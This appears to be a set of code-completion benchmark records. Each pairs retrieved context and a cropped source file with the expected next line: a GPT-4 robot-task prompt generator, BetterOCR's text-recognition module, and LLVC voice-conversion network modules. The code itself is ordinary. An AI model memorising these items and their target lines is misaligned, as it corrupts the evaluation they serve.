"snippet": "def parse_task_response(task_response):\n task_names = []\n task_descriptions = []\n additional_objects = []\n links = []\n joints = []\n\n task_response = task_response.split(\"\\n\")\n for l_idx, line in enumerate(task_response):\n if line.lower().startswith(\"task name:\"):\n task_name = line.split(\":\")[1].strip()\n task_name = task_name.replace(\"/\", \" or \").replace(\".\", \"\").replace(\"'\", \"\").replace('\"', \"\")\n task_names.append(task_name)\n task_description = task_response[l_idx+1].split(\":\")[1].strip()\n task_description = task_description.replace(\"/\", \" or \").replace(\".\", \"\").replace(\"'\", \"\").replace('\"', \"\").replace(\")\", \".\").replace(\"(\", \".\")\n task_descriptions.append(task_description)\n additional_objects.append(task_response[l_idx+2].split(\":\")[1].strip())\n involved_links = \"\"\n for link_idx in range(l_idx+4, len(task_response)):\n if task_response[link_idx].lower().startswith(\"joints:\"):\n break\n else:\n # involved_links.append(task_response[link_idx].split(\":\")[0][2:])\n involved_links += (task_response[link_idx][2:])\n links.append(involved_links)\n involved_joints = \"\"\n for joint_idx in range(link_idx+1, len(task_response)):\n if not task_response[joint_idx].lower().startswith(\"- \"):\n break\n else:\n # involved_joints.append(task_response[joint_idx].split(\":\")[0][2:])\n involved_joints += (task_response[joint_idx][2:])\n joints.append(involved_joints)\n\n return task_names, task_descriptions, additional_objects, links, joints"
},
{
"identifier": "query",
"path": "gpt_4/query.py",
"snippet": "def query(system, user_contents, assistant_contents, model='gpt-4', save_path=None, temperature=1, debug=False):\n \n for user_content, assistant_content in zip(user_contents, assistant_contents):\n user_content = user_content.split(\"\\n\")\n assistant_content = assistant_content.split(\"\\n\")\n \n for u in user_content:\n print(u)\n print(\"=====================================\")\n for a in assistant_content:\n print(a)\n print(\"=====================================\")\n\n for u in user_contents[-1].split(\"\\n\"):\n print(u)\n\n if debug:\n import pdb; pdb.set_trace()\n return None\n\n print(\"=====================================\")\n\n start = time.time()\n \n num_assistant_mes = len(assistant_contents)\n messages = []\n\n messages.append({\"role\": \"system\", \"content\": \"{}\".format(system)})\n for idx in range(num_assistant_mes):\n messages.append({\"role\": \"user\", \"content\": user_contents[idx]})\n messages.append({\"role\": \"assistant\", \"content\": assistant_contents[idx]})\n messages.append({\"role\": \"user\", \"content\": user_contents[-1]})\n\n openai.api_key = os.environ[\"OPENAI_API_KEY\"]\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature\n )\n\n result = ''\n for choice in response.choices: \n result += choice.message.content \n\n end = time.time()\n used_time = end - start\n\n print(result)\n if save_path is not None:\n with open(save_path, \"w\") as f:\n json.dump({\"used_time\": used_time, \"res\": result, \"system\": system, \"user\": user_contents, \"assistant\": assistant_contents}, f, indent=4)\n\n return result"
}
] | import numpy as np
import copy
import time, datetime
import os
import json
from objaverse_utils.utils import partnet_mobility_dict
from gpt_4.prompts.utils import build_task_given_text, parse_task_response
from gpt_4.query import query | 3,491 |
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
    # send the object articulation tree, semantics file and get task descriptions, involved objects and joints
# randomly sample an object for generation.
|
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
- link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
# send the object articulation tree, semantics file and get task descriptions, involved objects and joints
# randomly sample an object for generation.
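# presumably the sampled object's articulation tree and semantics are appended to task_user_contents above before querying the LLM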
| object_cetegories = list(partnet_mobility_dict.keys()) | 0 | 2023-10-31 19:44:09+00:00 | 4k |
junhoyeo/BetterOCR | betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/recognition.py | [
{
"identifier": "Model",
"path": "betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/model.py",
"snippet": "class Model(nn.Module):\n def __init__(self, opt2val: dict):\n super(Model, self).__init__()\n\n input_channel = opt2val[\"input_channel\"]\n output_channel = opt2val[\"output_channel\"]\n hidden_size = opt2val[\"hidden_size\"]\n vocab_size = opt2val[\"vocab_size\"]\n num_fiducial = opt2val[\"num_fiducial\"]\n imgH = opt2val[\"imgH\"]\n imgW = opt2val[\"imgW\"]\n FeatureExtraction = opt2val[\"FeatureExtraction\"]\n Transformation = opt2val[\"Transformation\"]\n SequenceModeling = opt2val[\"SequenceModeling\"]\n Prediction = opt2val[\"Prediction\"]\n\n # Transformation\n if Transformation == \"TPS\":\n self.Transformation = TpsSpatialTransformerNetwork(\n F=num_fiducial,\n I_size=(imgH, imgW),\n I_r_size=(imgH, imgW),\n I_channel_num=input_channel,\n )\n else:\n print(\"No Transformation module specified\")\n\n # FeatureExtraction\n if FeatureExtraction == \"VGG\":\n extractor = VGGFeatureExtractor\n else: # ResNet\n extractor = ResNetFeatureExtractor\n self.FeatureExtraction = extractor(\n input_channel,\n output_channel,\n opt2val,\n )\n self.FeatureExtraction_output = output_channel # int(imgH/16-1) * 512\n self.AdaptiveAvgPool = nn.AdaptiveAvgPool2d(\n (None, 1)\n ) # Transform final (imgH/16-1) -> 1\n\n # Sequence modeling\n if SequenceModeling == \"BiLSTM\":\n self.SequenceModeling = nn.Sequential(\n BidirectionalLSTM(\n self.FeatureExtraction_output,\n hidden_size,\n hidden_size,\n ),\n BidirectionalLSTM(hidden_size, hidden_size, hidden_size),\n )\n self.SequenceModeling_output = hidden_size\n else:\n print(\"No SequenceModeling module specified\")\n self.SequenceModeling_output = self.FeatureExtraction_output\n\n # Prediction\n if Prediction == \"CTC\":\n self.Prediction = nn.Linear(\n self.SequenceModeling_output,\n vocab_size,\n )\n elif Prediction == \"Attn\":\n self.Prediction = Attention(\n self.SequenceModeling_output,\n hidden_size,\n vocab_size,\n )\n elif Prediction == \"Transformer\": # TODO\n pass\n else:\n raise Exception(\"Prediction is neither CTC or Attn\")\n\n def forward(self, x: Tensor):\n \"\"\"\n :param x: (batch, input_channel, height, width)\n :return:\n \"\"\"\n # Transformation stage\n x = self.Transformation(x)\n\n # Feature extraction stage\n visual_feature = self.FeatureExtraction(x) # (b, output_channel=512, h=3, w)\n visual_feature = self.AdaptiveAvgPool(\n visual_feature.permute(0, 3, 1, 2)\n ) # (b, w, channel=512, h=1)\n visual_feature = visual_feature.squeeze(3) # (b, w, channel=512)\n\n # Sequence modeling stage\n self.SequenceModeling.eval()\n contextual_feature = self.SequenceModeling(visual_feature)\n\n # Prediction stage\n prediction = self.Prediction(\n contextual_feature.contiguous()\n ) # (b, T, num_classes)\n\n return prediction"
},
{
"identifier": "CTCLabelConverter",
"path": "betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/utils.py",
"snippet": "class CTCLabelConverter(object):\n \"\"\"Convert between text-label and text-index\"\"\"\n\n def __init__(self, vocab: list):\n self.char2idx = {char: idx for idx, char in enumerate(vocab)}\n self.idx2char = {idx: char for idx, char in enumerate(vocab)}\n self.ignored_index = 0\n self.vocab = vocab\n\n def encode(self, texts: list):\n \"\"\"\n Convert input texts into indices\n texts (list): text labels of each image. [batch_size]\n\n Returns\n text: concatenated text index for CTCLoss.\n [sum(text_lengths)] = [text_index_0 + text_index_1 + ... + text_index_(n - 1)]\n length: length of each text. [batch_size]\n \"\"\"\n lengths = [len(text) for text in texts]\n concatenated_text = \"\".join(texts)\n indices = [self.char2idx[char] for char in concatenated_text]\n\n return torch.IntTensor(indices), torch.IntTensor(lengths)\n\n def decode_greedy(self, indices: Tensor, lengths: Tensor):\n \"\"\"convert text-index into text-label.\n\n :param indices (1D int32 Tensor): [N*length,]\n :param lengths (1D int32 Tensor): [N,]\n :return:\n \"\"\"\n texts = []\n index = 0\n for length in lengths:\n text = indices[index : index + length]\n\n chars = []\n for i in range(length):\n if (text[i] != self.ignored_index) and (\n not (i > 0 and text[i - 1] == text[i])\n ): # removing repeated characters and blank (and separator).\n chars.append(self.idx2char[text[i].item()])\n texts.append(\"\".join(chars))\n index += length\n return texts\n\n def decode_beamsearch(self, mat, lm_model, lm_factor, beam_width: int = 5):\n texts = []\n for i in range(mat.shape[0]):\n text = ctcBeamSearch(\n mat[i],\n self.vocab,\n self.ignored_index,\n lm_model,\n lm_factor,\n beam_width,\n )\n texts.append(text)\n return texts"
}
] | import math
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.data
import torchvision.transforms as transforms
from PIL import Image
from .model import Model
from .utils import CTCLabelConverter
from collections import OrderedDict | 2,747 | def __init__(self, max_size, PAD_type: str = "right"):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probability (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer
| """
this code is adapted from https://github.com/black7375/korean_ocr_using_pororo
Apache License 2.0 @yunwoong7
Apache License 2.0 @black7375
"""
"""
This code is adapted from https://github.com/JaidedAI/EasyOCR/blob/8af936ba1b2f3c230968dc1022d0cd3e9ca1efbb/easyocr/recognition.py
"""
def contrast_grey(img):
high = np.percentile(img, 90)
low = np.percentile(img, 10)
return (high - low) / np.maximum(10, high + low), high, low
def adjust_contrast_grey(img, target: float = 0.4):
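# if the 10th-90th percentile contrast is below `target`, stretch the grey levels (ratio 200 / (high - low)) and clip to [0, 255]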
contrast, high, low = contrast_grey(img)
if contrast < target:
img = img.astype(int)
ratio = 200.0 / np.maximum(10, high - low)
img = (img - low + 25) * ratio
img = np.maximum(
np.full(img.shape, 0),
np.minimum(
np.full(img.shape, 255),
img,
),
).astype(np.uint8)
return img
class NormalizePAD(object):
def __init__(self, max_size, PAD_type: str = "right"):
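# max_size is (channels, height, width); __call__ normalises the image to [-1, 1] and right-pads it to this width, repeating the last column as a border pad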
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probability (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
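# confidence score: product of the per-timestep max probabilities (cumprod over the sequence, last element)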
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer | recognizer = Model(opt2val) | 0 | 2023-10-26 11:26:25+00:00 | 4k |
KoeAI/LLVC | minimal_rvc/modules.py | [
{
"identifier": "get_padding",
"path": "minimal_rvc/commons.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size * dilation - dilation) / 2)"
},
{
"identifier": "init_weights",
"path": "minimal_rvc/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "piecewise_rational_quadratic_transform",
"path": "minimal_rvc/transforms.py",
"snippet": "def piecewise_rational_quadratic_transform(\n inputs,\n unnormalized_widths,\n unnormalized_heights,\n unnormalized_derivatives,\n inverse=False,\n tails=None,\n tail_bound=1.0,\n min_bin_width=DEFAULT_MIN_BIN_WIDTH,\n min_bin_height=DEFAULT_MIN_BIN_HEIGHT,\n min_derivative=DEFAULT_MIN_DERIVATIVE,\n):\n if tails is None:\n spline_fn = rational_quadratic_spline\n spline_kwargs = {}\n else:\n spline_fn = unconstrained_rational_quadratic_spline\n spline_kwargs = {\"tails\": tails, \"tail_bound\": tail_bound}\n\n outputs, logabsdet = spline_fn(\n inputs=inputs,\n unnormalized_widths=unnormalized_widths,\n unnormalized_heights=unnormalized_heights,\n unnormalized_derivatives=unnormalized_derivatives,\n inverse=inverse,\n min_bin_width=min_bin_width,\n min_bin_height=min_bin_height,\n min_derivative=min_derivative,\n **spline_kwargs\n )\n return outputs, logabsdet"
}
] | import math
import torch
from torch import nn
from torch.nn import Conv1d
from torch.nn import functional as F
from torch.nn.utils import remove_weight_norm, weight_norm
from . import commons
from .commons import get_padding, init_weights
from .transforms import piecewise_rational_quadratic_transform | 2,261 | dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
)
| # This module is based on code from ddPn08, liujing04, and teftef6220
# https://github.com/ddPn08/rvc-webui
# https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI
# https://github.com/teftef6220/Voice_Separation_and_Selection
# These modules are licensed under the MIT License.
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(
self,
in_channels,
hidden_channels,
out_channels,
kernel_size,
n_layers,
p_dropout,
):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(
nn.Conv1d(
in_channels, hidden_channels, kernel_size, padding=kernel_size // 2
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout))
for _ in range(n_layers - 1):
self.conv_layers.append(
nn.Conv1d(
hidden_channels,
hidden_channels,
kernel_size,
padding=kernel_size // 2,
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
Dilated and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size**i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(
nn.Conv1d(
channels,
channels,
kernel_size,
groups=channels,
dilation=dilation,
padding=padding,
)
)
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(
self,
hidden_channels,
kernel_size,
dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
